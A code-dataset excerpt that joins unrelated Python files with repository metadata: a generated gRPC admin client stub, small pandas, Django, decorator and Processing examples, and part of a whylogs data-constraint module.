return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/UpdateAddress',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateAddressRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateAddressResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetTraits(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/GetTraits',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetTraitsRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetTraitsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def UpdateTraits(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/UpdateTraits',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateTraitsRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateTraitsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetCredentials(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/GetCredentials',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetCredentialsRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetCredentialsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def UpdateCredential(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/UpdateCredential',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateCredentialRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateCredentialResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetIdentityLoginAttempts(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/GetIdentityLoginAttempts',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentityLoginAttemptsRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentityLoginAttemptsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def CreateConnection(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/CreateConnection',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateConnectionRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateConnectionResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetConnections(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/GetConnections',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetConnectionsRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetConnectionsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def UpdateConnection(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/UpdateConnection',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateConnectionRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateConnectionResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def DeleteConnection(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/DeleteConnection',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteConnectionRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteConnectionResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def CreateIdSchema(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/CreateIdSchema',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateIdSchemaRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateIdSchemaResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetIdSchemas(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/GetIdSchemas',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdSchemasRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdSchemasResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetIdSchema(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/GetIdSchema',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdSchemaRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdSchemaResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetDefaultIdSchema(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/GetDefaultIdSchema',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetDefaultIdSchemaRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetDefaultIdSchemaResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def UpdateIdSchema(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/UpdateIdSchema',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateIdSchemaRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateIdSchemaResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def MarkDefaultIdSchema(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/MarkDefaultIdSchema',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.MarkDefaultIdSchemaRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.MarkDefaultIdSchemaResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def DeleteIdSchema(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/DeleteIdSchema',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteIdSchemaRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteIdSchemaResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def CreateOAuth2Client(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/CreateOAuth2Client',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateOAuth2ClientRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateOAuth2ClientResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetOAuth2Clients(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/GetOAuth2Clients',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetOAuth2ClientsRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetOAuth2ClientsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def UpdateOAuth2Client(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/UpdateOAuth2Client',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateOAuth2ClientRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateOAuth2ClientResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def DeleteOAuth2Client(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/DeleteOAuth2Client',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteOAuth2ClientRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteOAuth2ClientResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetEmailsSetup(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/GetEmailsSetup',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetEmailsSetupRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetEmailsSetupResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def UpdateEmailsSetup(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/UpdateEmailsSetup',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateEmailsSetupRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateEmailsSetupResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetUserBaseStatistics(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/GetUserBaseStatistics',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetUserBaseStatisticsRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetUserBaseStatisticsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
| 59.479817 | 164 | 0.725896 |
7eef7523932b29f9861b14ba707a8cb4e97912eb | 442 | py | Python | Modulo_5/semana_2/dataframe/iteracion/iteracion2.py | AutodidactaMx/cocid_python | 11628f465ff362807a692c79ede26bf30dd8e26a | [
"MIT"
] | null | null | null | Modulo_5/semana_2/dataframe/iteracion/iteracion2.py | AutodidactaMx/cocid_python | 11628f465ff362807a692c79ede26bf30dd8e26a | [
"MIT"
] | null | null | null | Modulo_5/semana_2/dataframe/iteracion/iteracion2.py | AutodidactaMx/cocid_python | 11628f465ff362807a692c79ede26bf30dd8e26a | [
"MIT"
] | 1 | 2022-03-04T00:57:18.000Z | 2022-03-04T00:57:18.000Z | # importing pandas as pd
import pandas as pd
# Lists
dict = {'nombre':["luis", "marcos", "marta", "pedro"],
'grado': ["LIC", "MTA", "DOC", "LIC"],
'puntaje':[90, 40, 80, 98]}
# Creating a DataFrame from a dictionary
df = pd.DataFrame(dict)
# creating a list of the DataFrame's columns
columns = list(df)
for i in columns:
    # printing the third element of each column
print (df[i][2])
| 24.555556 | 54 | 0.624434 |
206ca457a4dd0d48dbf0260038c61b742b39e238 | 639 | py | Python | config/urls.py | rigelk/magiciendose | d2613f6a548dd620f101f6533bf7bea71a5ab3b0 | [
"MIT"
] | 2 | 2021-04-23T21:35:02.000Z | 2021-04-24T15:17:16.000Z | config/urls.py | rigelk/magiciendose | d2613f6a548dd620f101f6533bf7bea71a5ab3b0 | [
"MIT"
] | 1 | 2021-04-24T17:20:33.000Z | 2021-04-24T17:23:15.000Z | config/urls.py | rigelk/magiciendose | d2613f6a548dd620f101f6533bf7bea71a5ab3b0 | [
"MIT"
] | 1 | 2021-04-23T14:35:58.000Z | 2021-04-23T14:35:58.000Z | from django.conf import settings
from django.contrib import admin
from django.urls import path, include
from rest_framework.schemas import get_schema_view
urlpatterns = [
path('admin/', admin.site.urls),
path('accounts/', include('allauth.urls')),
path('', include('pages.urls')),
path('api/', include('api_urls')),
path('openapi', get_schema_view(
title="MagicienDose",
description="API for MagicienDose",
version="1.0.0"
), name='openapi-schema'),
]
if settings.DEBUG:
import debug_toolbar
urlpatterns = [
path('__debug__/', include(debug_toolbar.urls)),
] + urlpatterns
| 27.782609 | 56 | 0.672926 |
fc7fc9a4cc19f323eb62cbd94f36a6b02b797f58 | 442 | py | Python | Fun Excercise/decorator5.py | NirmalSilwal/Python- | 6d23112db8366360f0b79bdbf21252575e8eab3e | [
"MIT"
] | 32 | 2020-04-05T08:29:40.000Z | 2022-01-08T03:10:00.000Z | Fun Excercise/decorator5.py | NirmalSilwal/Python- | 6d23112db8366360f0b79bdbf21252575e8eab3e | [
"MIT"
] | 3 | 2021-06-02T04:09:11.000Z | 2022-03-02T14:55:03.000Z | Fun Excercise/decorator5.py | NirmalSilwal/Python- | 6d23112db8366360f0b79bdbf21252575e8eab3e | [
"MIT"
] | 3 | 2020-07-13T05:44:04.000Z | 2021-03-03T07:07:58.000Z | def decorator_func(say_hello_func):
def wrapper_func(hello_var, world_var):
hello = "Hello, "
world = "World"
if not hello_var:
hello_var = hello
if not world_var:
world_var = world
return say_hello_func(hello_var, world_var)
return wrapper_func
@decorator_func
def say_hello(hello_var, world_var):
print(hello_var + " " + world_var)
say_hello("Hello", "") | 18.416667 | 51 | 0.626697 |
e3526c5e2d24166b71b1bfbdd443659a10f1061d | 26 | py | Python | python/test.py | chaleaoch/code | eba44be0b3d9a31434f32d0fd38332bf75a93130 | [
"MIT"
] | null | null | null | python/test.py | chaleaoch/code | eba44be0b3d9a31434f32d0fd38332bf75a93130 | [
"MIT"
] | null | null | null | python/test.py | chaleaoch/code | eba44be0b3d9a31434f32d0fd38332bf75a93130 | [
"MIT"
] | null | null | null | import json
import django
| 8.666667 | 13 | 0.846154 |
698765451946f2f554a12a324a494b51a576394d | 127 | py | Python | src/main/python/app/style.py | kevinyu/soundsep | 58f8100e101a6302533626d2f141c86748c8dc10 | [
"MIT"
] | 1 | 2020-10-03T18:35:52.000Z | 2020-10-03T18:35:52.000Z | src/main/python/app/style.py | theunissenlab/soundsep | 58f8100e101a6302533626d2f141c86748c8dc10 | [
"MIT"
] | null | null | null | src/main/python/app/style.py | theunissenlab/soundsep | 58f8100e101a6302533626d2f141c86748c8dc10 | [
"MIT"
] | 1 | 2020-08-12T17:16:15.000Z | 2020-08-12T17:16:15.000Z | qss = """
#Window{
background-color: white
}
QPushButton[flat="true"]{
background-color: black;
border: 0px;
}
"""
| 12.7 | 28 | 0.606299 |
385e2d026e5155bee5296a2c879aba6bcf7f2d01 | 3,849 | pyde | Python | font_fingerprints_square/font_fingerprints_square.pyde | cclauss/generative_art | fc179177badd8b54b4faefd6f36f3d974ff0ca65 | [
"MIT"
] | 11 | 2019-06-05T04:37:38.000Z | 2021-08-30T13:40:47.000Z | font_fingerprints_square/font_fingerprints_square.pyde | cclauss/generative_art | fc179177badd8b54b4faefd6f36f3d974ff0ca65 | [
"MIT"
] | null | null | null | font_fingerprints_square/font_fingerprints_square.pyde | cclauss/generative_art | fc179177badd8b54b4faefd6f36f3d974ff0ca65 | [
"MIT"
] | 1 | 2020-05-07T13:16:43.000Z | 2020-05-07T13:16:43.000Z | ################################################################################
# Aaron Penne
# 2018-08-28
# https://github.com/aaronpenne
################################################################################
import datetime
import string
import os
import sys
# Define globals here
rand_seed = 1138
frame_rate = 1
w = 2000 # width
h = 2000 # height
count = 0
timestamp = datetime.datetime.now().strftime('%Y%m%d_%H%M%S')
def setup():
# Sets size of canvas in pixels (must be first line)
size(w, h) # (width, height)
# Sets resolution dynamically (affects resolution of saved image)
pixelDensity(displayDensity()) # 1 for low, 2 for high
# Sets color space to Hue Saturation Brightness with max values of HSB respectively
colorMode(HSB, 360, 100, 100, 100)
# Set the number of frames per second to display
frameRate(frame_rate)
# Stops draw() from running in an infinite loop (should be last line)
randomSeed(rand_seed)
noLoop()
def draw():
global count
if count > 5000:
sys.exit(0)
count += 1
# Read font list
try:
with open('font_list_mac.txt', 'r') as f:
font_list = f.read().splitlines()
except:
print('Using all fonts')
font_list = PFont.list()
font_list = ['Webdings']
# filter_list = ['Bold', 'Italic', 'Heavy', 'Black', 'Light']
# font_list_text = [x for x in PFont.list() if ~any(f in x for f in filter_list)]
# # Get the fonts in a text file
# with open('font_list_mac.txt', 'w+') as f:
# for font in font_list_text:
# f.write('{}\n'.format(font))
text_size = 600
for font in font_list:
# Background color
# hue_val = random_centered(26.7, 5)
# sat_val = random_centered(3.7, 3)
# bri_val = random_centered(95.3, 3)
background(26.7, 3.7, 95.3) #f3eeea
# Initialize font
text_font = createFont(font, text_size)
textFont(text_font)
# Text properties
fill(0, 0, 4, 7) #3f3f3f
#fill(168, 31.7, 74.1, 4) #81bdb1
stroke(0, 0, 0)
textAlign(CENTER, CENTER)
textSize(text_size)
# Print each string at different locations
offset = h/3
h_pad = -h*0.04
print_string_stack(string.punctuation, w/3, h/3+h_pad)
print_string_stack(string.ascii_lowercase, 2*w/3, h/3+h_pad)
full_string = string.ascii_lowercase + string.ascii_uppercase + string.digits
print_string_stack(full_string, w/3, 2*h/3+h_pad)
print_string_stack(string.ascii_uppercase, 2*w/3, 2*h/3+h_pad)
# Prints the name of the font
text_font = createFont('LucidaSans-Typewriter', text_size)
textFont(text_font)
fill(0, 0, 0, 30)
textAlign(CENTER, BOTTOM)
textSize(35)
text(font, w/2, 5.6*offset)
font_name = font.replace('\\', '')
            font_name = font_name.replace('/', '')
output_filename = os.path.join('output', '{}_{}.png'.format(timestamp, font_name))
saveFrame(output_filename)
print(output_filename)
def random_list_value(val_list):
index = int(random(0, len(val_list)))
value = val_list[index]
return value
def random_centered(value_og, offset=5):
value = random(value_og-offset, value_og+offset)
return value
def print_string_stack(string_stack='TESt', w_offset=100, h_offset=100):
for c in string_stack:
text(c, w_offset, h_offset)
def create_filename(word, num_list=[]):
filename = word
for number in num_list:
filename = filename + '_{:04}'.format(int(number))
filename = filename + '.png'
return filename
| 29.381679 | 90 | 0.573655 |
68e00a03e4f49ca331f71aea8400f20f79447ee6 | 175 | py | Python | utils/stupid_timer.py | vladimirgamalyan/pictools | cfcda3f4a1272d8469f2dc604a8afc585929b0eb | [
"MIT"
] | null | null | null | utils/stupid_timer.py | vladimirgamalyan/pictools | cfcda3f4a1272d8469f2dc604a8afc585929b0eb | [
"MIT"
] | 1 | 2017-04-08T20:40:21.000Z | 2017-04-08T20:51:40.000Z | utils/stupid_timer.py | vladimirgamalian/pictools | cfcda3f4a1272d8469f2dc604a8afc585929b0eb | [
"MIT"
] | null | null | null | #!/usr/bin/python
import time
class StupidTimer:
def __init__(self, t):
self.t = time.clock() + t
def finished(self):
return time.clock() > self.t
| 14.583333 | 36 | 0.594286 |
09c319e4797542156f892f954e07dcae37673af5 | 468 | py | Python | books_api/core/models.py | kennyaires/olist-challenge | ec0194c9b48d4ec8693d3d39498f63f42dfaf251 | [
"MIT"
] | 1 | 2022-01-16T23:29:39.000Z | 2022-01-16T23:29:39.000Z | books_api/core/models.py | kennyaires/olist-challenge | ec0194c9b48d4ec8693d3d39498f63f42dfaf251 | [
"MIT"
] | 5 | 2021-03-19T12:18:04.000Z | 2021-09-22T19:43:58.000Z | books_api/core/models.py | kennyaires/olist-challenge | ec0194c9b48d4ec8693d3d39498f63f42dfaf251 | [
"MIT"
] | null | null | null | from django.db import models
class Author(models.Model):
name = models.CharField(max_length=255, unique=True)
def __str__(self):
return self.name
class Book(models.Model):
name = models.CharField(max_length=255)
edition = models.CharField(max_length=255, null=True)
publication_year = models.PositiveSmallIntegerField(blank=True, null=True)
authors = models.ManyToManyField(Author)
def __str__(self):
return self.name
| 24.631579 | 78 | 0.720085 |
a467c22a3332ab7726d2d639c1f2cc140293cac0 | 13,377 | py | Python | src/whylogs/core/statistics/constraints.py | whylabs/whylogs-python | 937c43ea87946ec294e6d7ec9f3c35cfa0b7a22b | [
"Apache-2.0"
] | 327 | 2020-08-18T17:09:44.000Z | 2021-02-25T11:03:57.000Z | src/whylogs/core/statistics/constraints.py | whylabs/whylogs-core | 80cce9d652553adc674d647e00ea8f414b75a95a | [
"Apache-2.0"
] | 66 | 2020-08-25T15:18:16.000Z | 2021-02-22T21:25:35.000Z | src/whylogs/core/statistics/constraints.py | whylabs/whylogs-python | 937c43ea87946ec294e6d7ec9f3c35cfa0b7a22b | [
"Apache-2.0"
] | 13 | 2020-09-08T22:44:10.000Z | 2021-01-28T00:32:58.000Z | import logging
import re
from typing import List, Mapping, Optional
from google.protobuf.json_format import Parse
from whylogs.proto import (
DatasetConstraintMsg,
DatasetProperties,
NumberSummary,
Op,
SummaryConstraintMsg,
SummaryConstraintMsgs,
ValueConstraintMsg,
ValueConstraintMsgs,
)
from whylogs.util.protobuf import message_to_json
logger = logging.getLogger(__name__)
"""
Dict indexed by constraint operator.
These help translate from constraint schema to language-specific functions that are faster to evaluate.
This is just a form of currying, and I chose to bind the boolean comparison operator first.
"""
_value_funcs = {
# functions that compare an incoming feature value to a literal value.
Op.LT: lambda x: lambda v: v < x, # assert incoming value 'v' is less than some fixed value 'x'
Op.LE: lambda x: lambda v: v <= x,
Op.EQ: lambda x: lambda v: v == x,
Op.NE: lambda x: lambda v: v != x,
Op.GE: lambda x: lambda v: v >= x,
Op.GT: lambda x: lambda v: v > x, # assert incoming value 'v' is greater than some fixed value 'x'
Op.MATCH: lambda x: lambda v: x.match(v) is not None,
Op.NOMATCH: lambda x: lambda v: x.match(v) is None,
}
_summary_funcs1 = {
# functions that compare a summary field to a literal value.
Op.LT: lambda f, v: lambda s: getattr(s, f) < v,
Op.LE: lambda f, v: lambda s: getattr(s, f) <= v,
Op.EQ: lambda f, v: lambda s: getattr(s, f) == v,
Op.NE: lambda f, v: lambda s: getattr(s, f) != v,
Op.GE: lambda f, v: lambda s: getattr(s, f) >= v,
Op.GT: lambda f, v: lambda s: getattr(s, f) > v,
}
_summary_funcs2 = {
# functions that compare two summary fields.
Op.LT: lambda f, f2: lambda s: getattr(s, f) < getattr(s, f2),
Op.LE: lambda f, f2: lambda s: getattr(s, f) <= getattr(s, f2),
Op.EQ: lambda f, f2: lambda s: getattr(s, f) == getattr(s, f2),
Op.NE: lambda f, f2: lambda s: getattr(s, f) != getattr(s, f2),
Op.GE: lambda f, f2: lambda s: getattr(s, f) >= getattr(s, f2),
Op.GT: lambda f, f2: lambda s: getattr(s, f) > getattr(s, f2),
}
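# Illustration (comment added, not part of the original module): how the curried
# tables above are intended to be used. The sample values are hypothetical.
#
#   is_lt_5 = _value_funcs[Op.LT](5)      # bind the literal first...
#   is_lt_5(3)                            # ...then apply to a streamed value -> True
#   is_lt_5(7)                            # -> False
#
#   min_nonneg = _summary_funcs1[Op.GE]("min", 0.0)
#   min_nonneg(number_summary)            # True when number_summary.min >= 0.0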
class ValueConstraint:
"""
ValueConstraints express a binary boolean relationship between an implied numeric value and a literal.
When associated with a ColumnProfile, the relation is evaluated for every incoming value that is processed by whylogs.
Parameters
----------
op : whylogs.proto.Op (required)
Enumeration of binary comparison operator applied between static value and incoming stream.
Enum values are mapped to operators like '==', '<', and '<=', etc.
value : (required)
Static value to compare against incoming stream using operator specified in `op`.
name : str
Name of the constraint used for reporting
verbose : bool
If true, log every application of this constraint that fails.
Useful to identify specific streaming values that fail the constraint.
"""
def __init__(self, op: Op, value=None, regex_pattern: str = None, name: str = None, verbose=False):
self._name = name
self._verbose = verbose
self.op = op
self.total = 0
self.failures = 0
if value is not None and regex_pattern is None:
# numeric value
self.value = value
self.func = _value_funcs[op](value)
elif regex_pattern is not None and value is None:
# Regex pattern
self.regex_pattern = regex_pattern
self.func = _value_funcs[op](re.compile(self.regex_pattern))
else:
raise ValueError("Value constraint must specify a numeric value or regex pattern, but not both")
@property
def name(self):
if getattr(self, "value", None):
return self._name if self._name is not None else f"value {Op.Name(self.op)} {self.value}"
else:
return self._name if self._name is not None else f"value {Op.Name(self.op)} {self.regex_pattern}"
def update(self, v) -> bool:
self.total += 1
if self.op in [Op.MATCH, Op.NOMATCH] and not isinstance(v, str):
self.failures += 1
if self._verbose:
logger.info(f"value constraint {self.name} failed: value {v} not a string")
elif not self.func(v):
self.failures += 1
if self._verbose:
logger.info(f"value constraint {self.name} failed on value {v}")
@staticmethod
def from_protobuf(msg: ValueConstraintMsg) -> "ValueConstraint":
return ValueConstraint(msg.op, msg.value, name=msg.name, verbose=msg.verbose)
def to_protobuf(self) -> ValueConstraintMsg:
if hasattr(self, "value"):
return ValueConstraintMsg(
name=self.name,
op=self.op,
value=self.value,
verbose=self._verbose,
)
else:
return ValueConstraintMsg(
name=self.name,
op=self.op,
regex_pattern=self.regex_pattern,
verbose=self._verbose,
)
def report(self):
return (self.name, self.total, self.failures)
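# Hedged usage sketch (added for illustration; not part of the original file).
# It relies only on the constructor, update() and report() defined above; the
# streamed values are made up.
#
#   not_negative = ValueConstraint(Op.GE, value=0)
#   for v in [3, -1, 7]:
#       not_negative.update(v)
#   not_negative.report()   # -> ('value GE 0', 3, 1), i.e. (name, total, failures)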
class SummaryConstraint:
"""
Summary constraints specify a relationship between a summary field and a static value,
or between two summary fields.
e.g. 'min' < 6
'std_dev' < 2.17
'min' > 'avg'
Parameters
----------
first_field : str
